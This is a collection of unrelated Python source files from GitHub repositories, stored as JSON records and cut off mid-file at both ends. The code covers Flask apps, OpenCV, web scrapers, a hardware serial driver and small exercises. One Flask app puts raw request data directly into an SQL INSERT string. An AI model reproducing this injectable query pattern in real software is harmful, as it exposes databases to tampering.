'exception':\n self.abre_tela()\n self.__tela_receitas_acoes.feedback_sucesso()\n self.registra_evento(\"Exclusão de receita\", titulo)\n\n # ------ MÉTODOS INTERNOS ------\n\n def registra_evento(self, acao, receita):\n registro = ''\n registro += 'Ação: ' + acao + \" - Receita: \" + receita + \" - Data: \" + str(date.today())\n self.__dao_relatorio.add(registro)\n\n def criar_lista_ingredientes(self, dados_ingredientes: dict):\n ingredientes_receita = []\n for nome_ingrediente in dados_ingredientes:\n if nome_ingrediente != '':\n add_ingrediente = IngredienteReceita(self.__controlador_ingrediente.get(nome_ingrediente),\n dados_ingredientes[nome_ingrediente])\n ingredientes_receita.append(add_ingrediente)\n return ingredientes_receita\n\n def lista_ingredientes_menu(self):\n lista_ingredientes = self.__controlador_ingrediente.get_all()\n lista_menu = []\n for i in lista_ingredientes:\n ing = i.nome + ', [{}]'.format(i.unidade_medida)\n lista_menu.append(ing)\n return lista_menu\n\n def retornar_menu_principal(self):\n self.__controlador_sistema.abre_tela()\n","repo_name":"paulazomig/sistema-de-receitas","sub_path":"Controladores/controlador_receita.py","file_name":"controlador_receita.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11534512965","text":"\"\"\"Transformations to make to a given column's raw data.\"\"\"\nfrom datetime import datetime\n\ndef convert_utc_timestamp_to_datetime_string(utc_time: float) -> str:\n \"\"\"Given a UTC timestamp, convert to a human-readable date string.\n \n >>> convert_utc_timestamp_to_datetime_string(1679147878.0)\n Sunday, March 19, 2023, at 8:11:18 PM \n \"\"\"\n utc_datetime = datetime.fromtimestamp(utc_time)\n return utc_datetime.strftime(\"%A, %B %d, %Y, at %I:%M:%S %p\")\n\nMAP_COL_TO_TRANSFORMATION = {\n \"created_utc_string\": {\n \"original_col\": \"created_utc\",\n \"transform_func\": convert_utc_timestamp_to_datetime_string\n }\n}\n\nTRANSFORMATION_FIELDS_LIST = [\"created_utc_string\"]\n","repo_name":"mark-torres10/redditResearch","sub_path":"src/ml/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38777342707","text":"import sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n# function\ndef cut(row, col, size):\n\t'''\n\tpaper[row][col]부터 시작하는 size*size 크기의 종이를 확인.\n\t모두 같은 수면 cnt 배열을 업데이트하고\n\t아니면 9등분해서 재귀함.\n\t'''\n\tisAll1 = isAll0 = isAllM1 = True\n\tfor r in range(row, row + size):\n\t\tfor c in range(col, col + size):\n\t\t\tif paper[r][c] == 0: isAll1 = isAllM1 = False\n\t\t\telif paper[r][c] == 1: isAllM1 = isAll0 = False\n\t\t\telse: isAll1 = isAll0 = False\n\t\tif not isAll1 and not isAll0 and not isAllM1: break\n\t\n\tif isAllM1: cnt[0] += 1\n\telif isAll0: cnt[1] += 1\n\telif isAll1: cnt[2] += 1\n\telse:\n\t\tsize //= 3\n\t\tfor i in range(3):\n\t\t\tfor j in range(3):\n\t\t\t\tcut(row + i * size, col + j * size, size)\n\n# input\nn = int(input())\npaper = [tuple(map(int, input().split())) for _ in range(n)]\n# process & output\ncnt = [0, 0, 0]\ncut(0, 0, n)\nprint(*cnt)","repo_name":"WaiNaat/TWS","sub_path":"QKIM/Acmicpc/A01780.py","file_name":"A01780.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21529243029","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(r'C:\\Users\\indra094\\Documents\\scripts\\ResultImages\\veins1.jpeg')\nimggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, thresh = cv2.threshold(imggray, 127, 255, 0)\nkernel = np.ones((2,2), np.uint8)\n\n#dilation = cv2.dilate(thresh, kernel, iterations=1)\nerosion = cv2.erode(thresh, kernel, iterations=5)\ndilation = cv2.dilate(erosion, kernel, iterations=5)\n\n \n# Find Canny edges\nedges = cv2.Canny(dilation, 30, 200)\n\ncontours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\ni=0\nfor cnt in contours:\n epsilon = 0.1*cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,epsilon,True)\n #cv2.imshow(\"orig2\"+str(i), approx)\n print (cv2.arcLength(cnt,True))\n print (cv2.contourArea(cnt))\n i +=1\n#COUNTOURS vector of x,y - boundary points\n\nprint (len(contours))\n#print (contours[1])\n\ncv2.drawContours(dilation, contours, -1, (0, 255, 0), 1)\n\ncv2.imshow(\"orig\", dilation)\ncv2.imshow(\"eroded\", edges)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"indra094/PythonStuffPlusOpenCV","sub_path":"Countours.py","file_name":"Countours.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33711392231","text":"from flask.json import JSONEncoder\nfrom meddit.post import Post\n\nclass PostsJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Post):\n return {\n 'id': obj.id,\n 'author': obj.author,\n 'gif_id': obj.gif_id,\n 'created': obj.created,\n 'votes': obj.votes,\n }\n return super().default(obj)\n","repo_name":"mking/meddit","sub_path":"meddit/posts_json_encoder.py","file_name":"posts_json_encoder.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1217534545","text":"import re\n\n# 同时提取 月 日\nregex = r\"^([a-zA-Z]+) (\\d+)$\" # 必须使用 raw string\nif re.search(regex, \"June 24\"):\n match = re.search(regex, \"June 24\")\n\n print(\"Match at index %s, %s\" % (match.start(), match.end()))\n\n # match.group(0),match.group() 全部提取信息\n # match.group(1), match.group(2), ... 从左到右返回提取信息\n print(\"Full match: %s\" % (match.group(0)))\n print(\"Month: %s\" % (match.group(1)))\n print(\"Day: %s\" % (match.group(2)))\nelse:\n print(\"The regex pattern does not match. :(\")\n\nregex = r\"^[a-zA-Z]+ \\d+$\"\n# 找出所有匹配信息\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Full match: %s\" % (match))\n\n# 提取月\nregex = r\"([a-zA-Z]+) \\d+\"\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match month: %s\" % (match))\n\nregex = r\"([a-zA-Z]+) \\d+\"\n# 返回匹配的开始 结束位置\nmatches = re.finditer(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match at index: %s, %s\" % (match.start(), match.end()))\n\nregex = r\"([a-zA-Z]+) (\\d+)\"\nregex1 = r\"\\2 of \\1\"\n\n# 替换提取到的信息为新的模式\nprint(re.sub(regex, regex1, \"June 24, August 9, Dec 12\"))\n\nregex = re.compile(r\"(\\w+) World\")\nresult = regex.search(\"Hello World is the easiest\")\nif result:\n print(result.start(), result.end())\n\nfor result in regex.findall(\"Hello World, Bonjour World\"):\n print(result)\n\nprint(regex.sub(r\"\\1 Earth\", \"Hello World\"))\n","repo_name":"AutuanLiu/Fastai-Notes-V3","sub_path":"src/Regular_expressions.py","file_name":"Regular_expressions.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"42345076261","text":"import os\nimport unittest\nfrom pyats.topology import loader\nfrom genie.libs.sdk.apis.linux.snmp.get import get_snmp_snmpwalk_v3\n\n\nclass TestGetSnmpSnmpwalkV3(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n testbed = f\"\"\"\n devices:\n morph-full2:\n connections:\n defaults:\n class: unicon.Unicon\n a:\n command: mock_device_cli --os linux --mock_data_dir {os.path.dirname(__file__)}/mock_data --state connect\n protocol: unknown\n os: linux\n platform: linux\n type: linux\n \"\"\"\n self.testbed = loader.load(testbed)\n self.device = self.testbed.devices['morph-full2']\n self.device.connect(\n learn_hostname=True,\n init_config_commands=[],\n init_exec_commands=[]\n )\n\n def test_get_snmp_snmpwalk_v3(self):\n result = get_snmp_snmpwalk_v3(self.device, '172.20.249.11', '1.3.6.1.4.1.9.9.25.1.1.1.2', 'TestUsr2', 'password1', 'authPriv', 'md5', 'des', 'password', '3', None)\n expected_output = 'snmpget: Unknown user name'\n self.assertEqual(result, expected_output)\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/linux/snmp/get/get_snmp_snmpwalk_v3/test_api_get_snmp_snmpwalk_v3.py","file_name":"test_api_get_snmp_snmpwalk_v3.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"5111478825","text":"import tkinter as tk\nfrom random import randrange\n\n# Create tk instance\nhome_page = tk.Tk()\n\n# Window title\nhome_page.title(\"Minigames by Victor Nestor\")\n\n# Disable resizing\nhome_page.resizable(False, False)\n\n# Window sizing and position\nwindow_height = 500\nwindow_width = 500\nscreen_height = home_page.winfo_screenheight()\nscreen_width = home_page.winfo_screenwidth()\ny_coordinate = int((screen_height/2) - (window_height/2))\nx_coordinate = int((screen_width/2) - (window_width/2))\n\n# Set the dimensions and position of window.\nhome_page.geometry(\"{}x{}+{}+{}\".format(window_width,\n window_height, x_coordinate, y_coordinate))\n\n# Grid geometry\n# home_page.grid_rowconfigure(0, weight=1)\n# home_page.grid_rowconfigure(1, weight=1)\n# home_page.grid_rowconfigure(2, weight=1)\n# home_page.grid_rowconfigure(3, weight=1)\n# home_page.grid_rowconfigure(4, weight=1)\n# home_page.grid_rowconfigure(5, weight=1)\n# home_page.grid_rowconfigure(6, weight=1)\n# home_page.grid_rowconfigure(7, weight=1)\n# home_page.grid_rowconfigure(8, weight=1)\n# home_page.grid_rowconfigure(9, weight=1)\n# home_page.grid_rowconfigure(10, weight=1)\nfor num in range(0, 8):\n # Create 8 rows\n home_page.grid_rowconfigure(num, weight=1)\n\n# home_page.grid_columnconfigure(0, weight=1)\n# home_page.grid_columnconfigure(1, weight=1)\n# home_page.grid_columnconfigure(2, weight=1)\n# home_page.grid_columnconfigure(3, weight=1)\n# home_page.grid_columnconfigure(4, weight=1)\n\nfor num in range(0, 5):\n # Create 5 columns\n home_page.grid_columnconfigure(num, weight=1)\n\n# Create labels\nhome_label = tk.Label(home_page, text=\"Python Minigames!\", font=(30))\nfirst_line_break = tk.Label(\n home_page, text=\"*\" * 75)\ngame_label = tk.Label(home_page, text=\"Pick A Game\", font=(20))\nchosen_label = tk.Label(home_page, text=\"Game chosen: \\n\\nNone\", font=(20))\nsecond_line_break = tk.Label(\n home_page, text=\"*\" * 75)\nthird_line_break = tk.Label(\n home_page, text=\"*\" * 75)\n\n# Create buttons\n\n# List of games\ngame_buttons = []\ntic_tac_toe_button = tk.Button(\n home_page, text=\"Tic-Tac-Toe\", command=lambda: set_game(1))\ngame_buttons.append(tic_tac_toe_button)\nrock_paper_scissors_button = tk.Button(\n home_page, text=\"Rock, Paper, Scissors\", command=lambda: set_game(2))\ngame_buttons.append(rock_paper_scissors_button)\nguess_the_number_button = tk.Button(\n home_page, text=\"Guess The Number\", command=lambda: set_game(3))\ngame_buttons.append(guess_the_number_button)\nsnake_game_button = tk.Button(\n home_page, text=\"Snake Game\", command=lambda: set_game(4))\ngame_buttons.append(snake_game_button)\n\n# Start game list\nstart_game_list = []\nstart_game_button = tk.Button(home_page, text=\"Start Game\")\nstart_game_list.append(start_game_button)\n\n\n# Append labels and buttons to home page\nhome_label.grid(row=0, column=0, columnspan=5)\nfirst_line_break.grid(row=1, column=0, columnspan=5)\ngame_label.grid(row=2, column=0, columnspan=5)\nsecond_line_break.grid(row=4, column=0, columnspan=5)\nchosen_label.grid(row=5, column=0, columnspan=5)\nthird_line_break.grid(row=6, column=0, columnspan=5)\n\n# Append game buttons\nfor row in range(0, 1):\n for col in range(0, 4):\n i = row * 4 + col\n game_buttons[i].grid(row=row+3, column=col+1)\n\nstart_game_list[0].grid(row=7, column=0, columnspan=5)\n\n\n# Setup for selected game\n\n# 0 for none selected\ngame_selected = 0\n\nprint(game_selected)\n\n# Reset all variables\n\n\ndef init():\n global game_buttons, mode_buttons, game_selected, chosen_label\n game_selected = 0\n chosen_label[\"text\"] = \"Game chosen: \\n\\nNone\"\n\n\ndef set_game(i):\n global game_buttons, mode_buttons, game_selected\n print(i)\n game_selected = i\n # Check which game is selected\n if game_selected == 1:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nTic-Tac-Toe\"\n elif game_selected == 2:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nRock, Paper, Scissors\"\n elif game_selected == 3:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nGuess The Number\"\n elif game_selected == 4:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nSnake Game\"\n\n\ndef start_game(i):\n global game_selected\n\n\n# Mainloop keeps the program running until closed by the user.\nhome_page.mainloop()\n","repo_name":"VNestor/python-minigames","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70171914250","text":"def createDataBase(db):\n cursor = db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS scores(bestScores)')\n\ndef insertNewHighScore(db, points):\n cursor = db.cursor()\n bestScore = returnBestScore(db)\n\n if points > bestScore:\n cursor.execute(f'INSERT INTO scores VALUES({points})')\n db.commit()\n\ndef returnBestScore(db):\n cursor = db.cursor()\n result = cursor.execute('SELECT bestScores FROM scores')\n\n bestScore = 0\n for row in result.fetchall():\n if row[0] > bestScore:\n bestScore = row[0]\n\n return bestScore\n","repo_name":"flipe27/flappy-bird","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74870835207","text":"import os\nimport sys\nimport serial\nimport threading\nimport struct\nimport time\nimport traceback\n\nfrom AutoGrader.devices import HardwareBase\n\n\nclass STM32(HardwareBase):\n CMD_RESET_DUT = 'U'\n CMD_RESET_TESTER = 'R'\n CMD_ENABLE_ANALOG = 'O'\n CMD_TERMINATE = 'E'\n \n START_DELIM = b'S'\n STOP_DELIM = b'E'\n TOTAL_PKT_LEN = 9\n\n # parameters\n baud_rate = 460800\n usb_path = None\n input_waveform_path = None\n output_waveform_path = None\n\n # device info\n name = None\n config = None\n\n # parent\n hardware_engine = None\n\n # serial\n dev = None\n\n # files\n fin = None\n output_metadata = None\n\n # thread status\n uart_reading_thread = None\n alive = True\n\n # execution\n execution_start_time = None\n\n def __init__(self, name, config, hardware_engine, file_folder):\n \n if 'baud' in config:\n self.baud_rate = config['baud']\n\n if \"usb_path\" not in config:\n raise Exception('\"usb_path\" field is required')\n self.usb_path = config['usb_path']\n\n if 'input_waveform_file' not in config:\n raise Exception('\"input_waveform_file\" field is required')\n self.input_waveform_path = os.path.join(file_folder, config['input_waveform_file'])\n\n if 'output_waveform_file' in config and config['output_waveform_file']:\n self.output_waveform_path = os.path.join(file_folder, config['output_waveform_file'])\n else:\n self.output_waveform_path = '/dev/null'\n\n if 'output_metadata' not in config:\n raise Exception('\"output_metadata\" field is required')\n self.output_metadata = config['output_metadata']\n\n self.name = name\n self.config = config\n self.hardware_engine = hardware_engine\n\n def on_before_execution(self):\n\n # open serial port\n tmp_dev = serial.Serial()\n tmp_dev.port = self.usb_path\n tmp_dev.baudrate = self.baud_rate\n tmp_dev.parity = serial.PARITY_NONE\n tmp_dev.bytesize = serial.EIGHTBITS\n tmp_dev.stopbits = serial.STOPBITS_ONE\n tmp_dev.timeout = 0.01\n tmp_dev.writeTimeout = None\n\n # open input waveform file but get rid of the metadata part\n self.fin = open(self.input_waveform_path, 'r')\n while True:\n line = self.fin.readline()\n if not line or line.strip() == '==':\n break\n\n # open output waveform file and write the meatadata part\n self.output_lines = []\n self.output_lines.append('') # period\n self.output_lines.append('Tick frequency: %f' % self.output_metadata['tick_frequency'])\n self.output_lines.append('Display start')\n for pin_config in self.output_metadata['pins']:\n self.output_lines.append('%s,%s' % (\n pin_config['label'],\n ','.join(list(map(str, pin_config['indexes']))),\n ))\n self.output_lines.append('Display end')\n self.output_lines.append('==')\n\n self.alive = True\n \n try:\n tmp_dev.open() \n self.dev = tmp_dev\n print('(STM32) UART is open')\n self.send_command(self.CMD_RESET_TESTER)\n print('(STM32) reset')\n time.sleep(1)\n self.uart_reading_thread = threading.Thread(\n target=self._reading_thread, name=('STM32-%s-reading' % self.name)).start()\n except:\n exc_info = sys.exc_info()\n print('(STM32) UART device unable to open, full stack trace below')\n traceback.print_exception(*exc_info)\n self.alive = False\n\n def on_execute(self):\n self.execution_start_time = time.time()\n\n # feed input waveform file into STM32\n for line in self.fin:\n if not self.alive:\n break\n terms = line.split(',')\n pkt_type, pkt_time, pkt_val = chr(int(terms[0])), int(terms[1]), int(terms[2])\n binary = struct.pack('=ccIHc', self.START_DELIM, pkt_type.encode('ascii'), pkt_time,\n pkt_val, self.STOP_DELIM)\n if not self.dev:\n print('(STM32) UART device does not exist, not able to send the command')\n return\n self.dev.write(binary)\n print('(STM32) packet sent', pkt_type, pkt_time, pkt_val)\n\n self.fin.close()\n\n def on_terminate(self):\n self.alive = False\n \n execution_stop_time = time.time()\n execution_elasped_time = execution_stop_time - self.execution_start_time\n self.output_lines[0] = \"Period: %f\" % execution_elasped_time\n\n with open(self.output_waveform_path, 'w') as fo:\n fo.write('\\n'.join(self.output_lines))\n \n def on_reset_after_execution(self):\n \n try:\n self.dev.flush()\n self.dev.close()\n print('(STM32) UART is closed')\n except:\n print('(STM32) UART device unable to close')\n self.dev = None\n\n def __del__(self):\n if self.dev and self.dev.is_open:\n self.dev.close()\n\n def _reading_thread(self):\n rx_buffer = b''\n\n while self.alive:\n # continue immediately if serial isn't ready\n if not self.dev:\n continue\n\n # Because we set a read timeout, chances are we only get a \n # partial of a packet\n rx_buffer += self.dev.read(self.TOTAL_PKT_LEN)\n \n # Thus, if it's not a complete packet yet, read more\n if len(rx_buffer) < self.TOTAL_PKT_LEN:\n continue\n\n # check the packet is valid via start and stop byte\n # (The reason that we have to use bytes[0:1] is that var[0] returns an int)\n if rx_buffer[0:1] == self.START_DELIM and rx_buffer[8:9] == self.STOP_DELIM:\n self._handle_packet_payload(rx_buffer[1:8])\n else:\n print('(STM32) bad packet!', rx_buffer[0:9])\n\n rx_buffer = rx_buffer[9:]\n \n def _handle_packet_payload(self, binary):\n # 1B type, 4B time, 2B val\n [pkt_type, pkt_time, pkt_val] = struct.unpack('<cLH', binary)\n try:\n pkt_type = pkt_type.decode('ascii')\n except:\n print('(STM32) Cannot handle the packet...')\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback, file=sys.stdout)\n return\n \n print('type: %s, time: %d, val: %d' % (pkt_type, pkt_time, pkt_val))\n if pkt_type is not self.CMD_TERMINATE:\n self.output_lines.append('%d, %d, %d' % (ord(pkt_type), pkt_time, pkt_val))\n else:\n self.hardware_engine.notify_terminate()\n self.alive = False\n \n def send_command(self, cmd):\n payload = self.START_DELIM + cmd.encode() + b'\\x00\\x00\\x00\\x00\\x00\\x00' + self.STOP_DELIM\n self.dev.write(payload)\n \n","repo_name":"nesl/hart_comm","sub_path":"AutoGrader/devices/STM32.py","file_name":"STM32.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"15854857318","text":"from flask import Flask\nfrom flask import request\nimport psycopg2\nimport sys\n\ncon = psycopg2.connect(host='postgres', port='5432', database='postgres', user='postgres', password='secret')\ncur = con.cursor()\ncur.execute(\"CREATE TABLE IF NOT EXISTS reverse (input VARCHAR(255), output VARCHAR(255))\")\ncon.commit()\n\napp = Flask(__name__)\n@app.route(\"/reverse\", methods = [\"POST\"])\ndef reverse():\n reverse = request.get_data()[::-1]\n cur = con.cursor()\n cur.execute(\"INSERT INTO reverse VALUES ('\" + request.get_data() + \"', '\" + reverse + \"')\")\n con.commit()\n return reverse\n\n@app.route(\"/cache\", methods = [\"GET\"])\ndef get():\n cur = con.cursor()\n cur.execute('SELECT * FROM reverse')\n return str(cur.fetchall())\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"Unarmed/docker-python","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35364918900","text":"from bs4 import BeautifulSoup\nimport requests\nimport lxml\nimport csv\n\n\n# получим суп\ndef get_soup(url):\n response = requests.get(url=url)\n response.encoding = 'utf-8'\n\n soup = BeautifulSoup(response.text, 'lxml')\n\n return soup\n\n# получим пагинацию\ndef get_pagen(url, shema):\n\n soup = get_soup(url)\n \n pagen = soup.find('div', class_='pagen').find_all('a')\n pagen = [f\"{shema}{link['href']}\" for link in soup.find('div', class_='pagen').find_all('a')]\n\n return pagen\n\nshema = 'http://parsinger.ru/html/'\n\nurls = ['http://parsinger.ru/html/index1_page_1.html',\n 'http://parsinger.ru/html/index2_page_1.html',\n 'http://parsinger.ru/html/index3_page_1.html',\n 'http://parsinger.ru/html/index4_page_1.html',\n 'http://parsinger.ru/html/index5_page_1.html']\n\npagen = []\n\nfor url in urls:\n pagen.append(get_pagen(url, shema))\n\npagen = sum(pagen, []) #преобразуем список списков в простой список\n\ndata = []\nfor page in pagen:\n\n soup = get_soup(page)\n\n cards = soup.find_all('div', class_='item')\n for card in cards:\n try:\n name = card.find('a', class_='name_item').text.lstrip()\n description = card.find('div', class_='description').text.split('\\n')\n brand = description[1].split(': ')[1].strip()\n spec_1 = description[2].split(': ')[1].strip()\n spec_2 = description[3].split(': ')[1].strip()\n spec_3 = description[4].split(': ')[1].strip()\n price = card.find('p', class_='price').text.replace(' руб', '').strip()\n except:\n pass\n\n data.append((name, brand, spec_1, spec_2, spec_3, price))\n \n# сохраняем данные в csv-файл\nwith open('data.csv', 'w', encoding='utf-8-sig', newline='') as file:\n writer = csv.writer(file, delimiter=',')\n writer.writerows(data)","repo_name":"ivan-varyukhin/bs4_parsers","sub_path":"parsing2csv_4-9-5.py","file_name":"parsing2csv_4-9-5.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38363324901","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport sys\nsys.path.append('build/lib.linux-x86_64-2.7')\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nimport numpy as np\nimport cv2\nimport tensorflow as tf\nfrom tensorflow.python.framework import meta_graph\nimport picpac\nimport _pic2pic\nfrom gallery import Gallery\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nflags.DEFINE_string('db', None, '')\nflags.DEFINE_string('output', None, '')\nflags.DEFINE_string('model', 'model', 'Directory to put the training data.')\nflags.DEFINE_integer('stride', 8, '')\nflags.DEFINE_integer('downsize', 4, 'has no effect')\nflags.DEFINE_integer('max', 32, '')\nflags.DEFINE_float('T', None, '')\nflags.DEFINE_float('s_add', None, '')\nflags.DEFINE_float('s_mul', None, '')\n\ndef main (_):\n assert FLAGS.db and os.path.exists(FLAGS.db)\n assert FLAGS.model and os.path.exists(FLAGS.model + '.meta')\n\n GRAY = tf.placeholder(tf.float32, shape=(None, None, None, 1))\n\n mg = meta_graph.read_meta_graph_file(FLAGS.model + '.meta')\n COLOR, = tf.import_graph_def(mg.graph_def, name='colorize',\n #input_map={'L:0':L},\n input_map={'gray:0':GRAY},\n return_elements=['color:0'])\n #prob = tf.nn.softmax(logits)\n saver = tf.train.Saver(saver_def=mg.saver_def, name='colorize')\n\n picpac_config = dict(seed=2016,\n cache=False,\n max_size=200,\n min_size=192,\n crop_width=192,\n crop_height=192,\n shuffle=True,\n #reshuffle=True,\n batch=1,\n round_div=FLAGS.stride,\n channels=3,\n stratify=False,\n channel_first=False # this is tensorflow specific\n # Caffe's dimension order is different.\n )\n\n stream = picpac.ImageStream(FLAGS.db, perturb=False, loop=False, **picpac_config)\n\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n saver.restore(sess, FLAGS.model)\n gallery = Gallery(FLAGS.output, cols=2, header=['groundtruth', 'prediction'])\n c = 0\n for images, _, _ in stream:\n if FLAGS.max and (c >= FLAGS.max):\n break\n gray, _, _ = _pic2pic.encode_bgr(images.copy(), FLAGS.downsize)\n #l, ab, w = _pic2pic.encode_lab(images.copy(), FLAGS.downsize)\n #\n color, = sess.run([COLOR], feed_dict={GRAY: gray})\n\n cv2.imwrite(gallery.next(), gray[0])\n\n full = np.zeros(images.shape, dtype=np.float32)\n color /= 255.0\n gray /= 255.0\n _, H, W, _ = images.shape\n for i in range(images.shape[0]):\n lab = cv2.cvtColor(cv2.cvtColor(gray[i], cv2.COLOR_GRAY2BGR), cv2.COLOR_BGR2LAB)\n print(lab.shape)\n full[i, :, :, :1] = lab[:, :, :1]\n one = cv2.resize(color[i], (W, H))\n\n lab = cv2.cvtColor(one, cv2.COLOR_BGR2LAB)\n full[i, :, :, 1:] = lab[:, :, 1:]\n cv2.cvtColor(full[i], cv2.COLOR_LAB2BGR, full[i])\n if FLAGS.s_add and FLAGS.s_mul:\n hsv = cv2.cvtColor(full[i], cv2.COLOR_BGR2HSV)\n h, s, v = cv2.split(hsv)\n s *= FLAGS.s_mul\n s += FLAGS.s_add\n hsv = cv2.merge([h, s, v])\n cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR, full[i])\n pass\n full *= 255\n cv2.imwrite(gallery.next(), full[0])\n #y_p = decode_lab(l, ab_p, T=FLAGS.T)\n c += 1\n print('%d/%d' % (c, FLAGS.max))\n pass\n gallery.flush()\n pass\n pass\n\nif __name__ == '__main__':\n tf.app.run()\n\n","repo_name":"aaalgo/pic2pic","sub_path":"gan-colorize-val.py","file_name":"gan-colorize-val.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41672794051","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[7]:\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef scrape_amazon(keyword):\n url = f'https://www.amazon.in/s?k={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'data-component-type': 's-search-result'})\n\n results = []\n for product in products:\n name_elem = product.find('span', {'class': 'a-size-medium'})\n price_elem = product.find('span', {'class': 'a-offscreen'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\ndef scrape_walmart(keyword):\n url = f'https://www.walmart.com/search/?query={keyword}'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n products = soup.find_all('div', {'class': 'search-result-product-title'})\n\n results = []\n for product in products:\n name_elem = product.find('a')\n price_elem = product.find_next('span', {'class': 'price-group'})\n\n if name_elem and price_elem:\n name = name_elem.text.strip()\n price = price_elem.text.strip()\n results.append({'name': name, 'price': price})\n\n return results\n\n# Example usage\nkeyword = 'laptop'\namazon_results = scrape_amazon(keyword)\nwalmart_results = scrape_walmart(keyword)\n\nif not amazon_results:\n print('No results found on Amazon.')\nelse:\n print('Amazon Results:')\n for result in amazon_results:\n print(result['name'], result['price'])\n\nif not walmart_results:\n print('No results found on Walmart.')\nelse:\n print('\\nWalmart Results:')\n for result in walmart_results:\n print(result['name'], result['price'])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"NikeshKr/AmazonWebScrapper","sub_path":"amazonscrapper.py.py","file_name":"amazonscrapper.py.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3085715238","text":"# ******************************************************\n# Program: compare_fields.py\n# Author: Stefano Ubbiali\n# Email: subbiali@phys.ethz.ch\n# Date: 04.06.2020\n# Description: Comparing two NumPy arrays\n# ******************************************************\nimport click\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef read_field_from_file(filename, num_halo=None):\n (rank, nbits, num_halo, nx, ny, nz) = np.fromfile(filename, dtype=np.int32, count=6)\n offset=(3 + rank) * 32 // nbits\n data = np.fromfile(filename, dtype=np.float32 if nbits == 32 else np.float64, \\\n count=nz * ny * nx + offset)\n if rank == 3:\n return np.reshape(data[offset:], (nz, ny, nx))\n else:\n return np.reshape(data[offset:], (ny, nx))\n\nfig, axs = plt.subplots(1, 1) #, figsize=(12, 4))\n\nref_field = read_field_from_file('out_field_mpi.dat')\nhybrid_field = read_field_from_file('out_field_mpiomp.dat')\ncomp_field = hybrid_field - ref_field\n \nk_lev = in_field.shape[0] // 2\nim1 = axs[0].imshow(comp_field[k_lev, :, :], origin='lower', 